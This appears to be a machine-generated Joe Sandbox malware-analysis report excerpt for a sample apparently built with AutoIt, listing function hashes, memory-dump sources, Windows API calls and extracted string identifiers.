                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 5a0a344de4880cee64c1ed3a9021e3ec4c716cb0d875937829c4e21246e5e9c9
                                                            • Instruction ID: c4778f969f977cf0a2b16b3cf346b0a03f95e6b693ac39e8fd838cb3f27b7cb8
                                                            • Opcode Fuzzy Hash: 5a0a344de4880cee64c1ed3a9021e3ec4c716cb0d875937829c4e21246e5e9c9
                                                            • Instruction Fuzzy Hash: 61A0123000030CA79A002F41EC044447F5CD6001917004020F80C84131873254104590
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 02d62a8497528d500e19e626f90803e38c714dc3c35ea1e5587436d39d5ea80e
                                                            • Instruction ID: 74f55a9b047a8b6f1e5946efb3e5c9d65107846a0a9ba55a591e46d5d44473d5
                                                            • Opcode Fuzzy Hash: 02d62a8497528d500e19e626f90803e38c714dc3c35ea1e5587436d39d5ea80e
                                                            • Instruction Fuzzy Hash: D4227A309046A2CBDF388B16F494B7C77A1FF00308F28807AD95A8B596DB70DE99D761
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction ID: 389b2d674deef2fa02f1a6c11df435b67ff826a9bc0cb92f466e297cd5ab8864
                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction Fuzzy Hash: 1EC1A4322050974ADFAE463AC43413EFBA15EA27B131E176DD9B3CB1D4EE20CA25D621
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction ID: 8c93340312909f14bd1a3d85d87744420a683835a2fda0b10347a0f02456e233
                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction Fuzzy Hash: A2C192332051974ADFAE463AC43403EBBA15EA27B131E076DD9B2DB1D4EE20CB25D621
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction ID: 82fbe367399ebebefca472821b341260be3c2f479a1d3353e173f3cb238f9fa5
                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction Fuzzy Hash: 6EC196322051978ADFAE463AC47413EBBB15EA27B131E075DDDB3CB1C4EE20CA25D621
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00D4785B
                                                            • DeleteObject.GDI32(00000000), ref: 00D4786D
                                                            • DestroyWindow.USER32 ref: 00D4787B
                                                            • GetDesktopWindow.USER32 ref: 00D47895
                                                            • GetWindowRect.USER32(00000000), ref: 00D4789C
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00D479DD
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00D479ED
                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47A35
                                                            • GetClientRect.USER32(00000000,?), ref: 00D47A41
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D47A7B
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47A9D
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47AB0
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47ABB
                                                            • GlobalLock.KERNEL32(00000000), ref: 00D47AC4
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47AD3
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00D47ADC
                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47AE3
                                                            • GlobalFree.KERNEL32(00000000), ref: 00D47AEE
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47B00
                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00D62CAC,00000000), ref: 00D47B16
                                                            • GlobalFree.KERNEL32(00000000), ref: 00D47B26
                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00D47B4C
                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00D47B6B
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47B8D
                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47D7A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-3613752883
                                                            • Opcode ID: 4e4862b3fc97c4d2922e9040e81bbba73a7625445ca5c99fc98ba32720386b76
                                                            • Instruction ID: 1934023868a49afa172fd7a0f6ac4306692989b28fafcc3eeba4603396be8053
                                                            • Opcode Fuzzy Hash: 4e4862b3fc97c4d2922e9040e81bbba73a7625445ca5c99fc98ba32720386b76
                                                            • Instruction Fuzzy Hash: 1C022675900215AFDB14DFA8DD89EAE7BB9EB48311F148169F915EB3A1CB30AD01CB70
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 00D5A630
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00D5A661
                                                            • GetSysColor.USER32(0000000F), ref: 00D5A66D
                                                            • SetBkColor.GDI32(?,000000FF), ref: 00D5A687
                                                            • SelectObject.GDI32(?,00000000), ref: 00D5A696
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00D5A6C1
                                                            • GetSysColor.USER32(00000010), ref: 00D5A6C9
                                                            • CreateSolidBrush.GDI32(00000000), ref: 00D5A6D0
                                                            • FrameRect.USER32(?,?,00000000), ref: 00D5A6DF
                                                            • DeleteObject.GDI32(00000000), ref: 00D5A6E6
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00D5A731
                                                            • FillRect.USER32(?,?,00000000), ref: 00D5A763
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00D5A78E
                                                              • Part of subcall function 00D5A8CA: GetSysColor.USER32(00000012), ref: 00D5A903
                                                              • Part of subcall function 00D5A8CA: SetTextColor.GDI32(?,?), ref: 00D5A907
                                                              • Part of subcall function 00D5A8CA: GetSysColorBrush.USER32(0000000F), ref: 00D5A91D
                                                              • Part of subcall function 00D5A8CA: GetSysColor.USER32(0000000F), ref: 00D5A928
                                                              • Part of subcall function 00D5A8CA: GetSysColor.USER32(00000011), ref: 00D5A945
                                                              • Part of subcall function 00D5A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D5A953
                                                              • Part of subcall function 00D5A8CA: SelectObject.GDI32(?,00000000), ref: 00D5A964
                                                              • Part of subcall function 00D5A8CA: SetBkColor.GDI32(?,00000000), ref: 00D5A96D
                                                              • Part of subcall function 00D5A8CA: SelectObject.GDI32(?,?), ref: 00D5A97A
                                                              • Part of subcall function 00D5A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00D5A999
                                                              • Part of subcall function 00D5A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D5A9B0
                                                              • Part of subcall function 00D5A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00D5A9C5
                                                              • Part of subcall function 00D5A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00D5A9ED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                            • String ID: @U=u
                                                            • API String ID: 3521893082-2594219639
                                                            • Opcode ID: 1fae1c875c443eed2e5ee4486a72d390f2f91cfd6dd957a9764ddd02b3690c7c
                                                            • Instruction ID: 3449d84cf13a5270c19a3e1826f62394a1b6a49fa95d506d109ccc4d8fd1a362
                                                            • Opcode Fuzzy Hash: 1fae1c875c443eed2e5ee4486a72d390f2f91cfd6dd957a9764ddd02b3690c7c
                                                            • Instruction Fuzzy Hash: 7D916E71008711AFCB119F68DC08E5B7BA9FB48322F140B29FD62DA2E1D771D944CB62
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,00D5F910), ref: 00D53627
                                                            • IsWindowVisible.USER32(?), ref: 00D5364B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpperVisibleWindow
                                                            • String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 4105515805-3469695742
                                                            • Opcode ID: 73699a9a336b9697f54603df9163cfb46a96892328a4548f97d103f1da06a96e
                                                            • Instruction ID: a57072c4cebab1f21f25c89c81a0ded563ff0de4dc445f307024bde91fd9c874
                                                            • Opcode Fuzzy Hash: 73699a9a336b9697f54603df9163cfb46a96892328a4548f97d103f1da06a96e
                                                            • Instruction Fuzzy Hash: C3D161702043019BCF04EF10C965A7EB7A1EF94795F184459FD865B3A2DB31EE0AEB62
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?), ref: 00CD2CA2
                                                            • DeleteObject.GDI32(00000000), ref: 00CD2CE8
                                                            • DeleteObject.GDI32(00000000), ref: 00CD2CF3
                                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 00CD2CFE
                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 00CD2D09
                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00D0C43B
                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D0C474
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D0C89D
                                                              • Part of subcall function 00CD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00CD2036,?,00000000,?,?,?,?,00CD16CB,00000000,?), ref: 00CD1B9A
                                                            • SendMessageW.USER32(?,00001053), ref: 00D0C8DA
                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D0C8F1
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00D0C907
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00D0C912
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                            • String ID: 0$@U=u
                                                            • API String ID: 464785882-975001249
                                                            • Opcode ID: 578bcb31db14c463f89f9c5c4607a56e4c8bbf08a5be062c1f3abbca3289daeb
                                                            • Instruction ID: 64dcfd4fce860c21d06279a99d1c8b885848dcb31570a4400209cc5bb42b9545
                                                            • Opcode Fuzzy Hash: 578bcb31db14c463f89f9c5c4607a56e4c8bbf08a5be062c1f3abbca3289daeb
                                                            • Instruction Fuzzy Hash: 83129E30614201EFDB25CF24C888BA9B7E5FF54341F58566AF999CB2A2C731EC41DBA1
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 00D474DE
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00D4759D
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00D475DB
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00D475ED
                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00D47633
                                                            • GetClientRect.USER32(00000000,?), ref: 00D4763F
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00D47683
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00D47692
                                                            • GetStockObject.GDI32(00000011), ref: 00D476A2
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00D476A6
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00D476B6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D476BF
                                                            • DeleteDC.GDI32(00000000), ref: 00D476C8
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00D476F4
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00D4770B
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00D47746
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00D4775A
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00D4776B
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00D4779B
                                                            • GetStockObject.GDI32(00000011), ref: 00D477A6
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00D477B1
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00D477BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-2771358697
                                                            • Opcode ID: b2bf76acfba36843cd8e6edb91b655ec9b4cc11f38661d5bae6ebdc3e4d6ac91
                                                            • Instruction ID: 60f38fef0fdbb5d96a96969dc8b51c7b680419de8682f8544672e67731fa6531
                                                            • Opcode Fuzzy Hash: b2bf76acfba36843cd8e6edb91b655ec9b4cc11f38661d5bae6ebdc3e4d6ac91
                                                            • Instruction Fuzzy Hash: FEA15C71A40705BFEB149BA8DD4AFAE7BA9EB09711F004125FA15EB3E0D770AD00CB64
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 00D5A903
                                                            • SetTextColor.GDI32(?,?), ref: 00D5A907
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00D5A91D
                                                            • GetSysColor.USER32(0000000F), ref: 00D5A928
                                                            • CreateSolidBrush.GDI32(?), ref: 00D5A92D
                                                            • GetSysColor.USER32(00000011), ref: 00D5A945
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D5A953
                                                            • SelectObject.GDI32(?,00000000), ref: 00D5A964
                                                            • SetBkColor.GDI32(?,00000000), ref: 00D5A96D
                                                            • SelectObject.GDI32(?,?), ref: 00D5A97A
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00D5A999
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D5A9B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00D5A9C5
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00D5A9ED
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00D5AA14
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00D5AA32
                                                            • DrawFocusRect.USER32(?,?), ref: 00D5AA3D
                                                            • GetSysColor.USER32(00000011), ref: 00D5AA4B
                                                            • SetTextColor.GDI32(?,00000000), ref: 00D5AA53
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00D5AA67
                                                            • SelectObject.GDI32(?,00D5A5FA), ref: 00D5AA7E
                                                            • DeleteObject.GDI32(?), ref: 00D5AA89
                                                            • SelectObject.GDI32(?,?), ref: 00D5AA8F
                                                            • DeleteObject.GDI32(?), ref: 00D5AA94
                                                            • SetTextColor.GDI32(?,?), ref: 00D5AA9A
                                                            • SetBkColor.GDI32(?,?), ref: 00D5AAA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID: @U=u
                                                            • API String ID: 1996641542-2594219639
                                                            • Opcode ID: a085aeea1352e56fcd38838f09fad7a4cea08799dd8a9f20b82e5a69efb30275
                                                            • Instruction ID: 3a61a5f2f2030790bacf81b48ebd3a6c143d945cc25583885d3b07fe4453210d
                                                            • Opcode Fuzzy Hash: a085aeea1352e56fcd38838f09fad7a4cea08799dd8a9f20b82e5a69efb30275
                                                            • Instruction Fuzzy Hash: 0E511C71900318AFDF119FA8DC48EAE7B79EB08322F254625FD11EB2A1D7719940DFA0
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00D3AD1E
                                                            • GetDriveTypeW.KERNEL32(?,00D5FAC0,?,\\.\,00D5F910), ref: 00D3ADFB
                                                            • SetErrorMode.KERNEL32(00000000,00D5FAC0,?,\\.\,00D5F910), ref: 00D3AF59
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 4adc003e65c1a0fa7ba350036e5bd2282e2187a5ddab1e5f8f3cca8cf58e7c70
                                                            • Instruction ID: 40cf8ed4e49b4faea77ab1f93b74b11997bdde9cd932cf2820a57a3d452be3b7
                                                            • Opcode Fuzzy Hash: 4adc003e65c1a0fa7ba350036e5bd2282e2187a5ddab1e5f8f3cca8cf58e7c70
                                                            • Instruction Fuzzy Hash: AA518FB4748205AF8B14EB18C982CBD73A1EF48740F644166F887AB2D1DA31ED05FB72
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00D59AD2
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00D59B8B
                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 00D59BA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: 0$@U=u
                                                            • API String ID: 2326795674-975001249
                                                            • Opcode ID: 4eca87e5ab7722ebf205bff8df9ea2a6de4b34232cbe0a8da918c670cc23ab95
                                                            • Instruction ID: fdca49a2f4a05aba7b2003a8ced0dffcafcd5cb17745e4e3744e05c669bd0c69
                                                            • Opcode Fuzzy Hash: 4eca87e5ab7722ebf205bff8df9ea2a6de4b34232cbe0a8da918c670cc23ab95
                                                            • Instruction Fuzzy Hash: 33029C30105301EBDB25CF24C869BAABBE5FF49316F08452DFD99DA2A1C774D948CB62
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
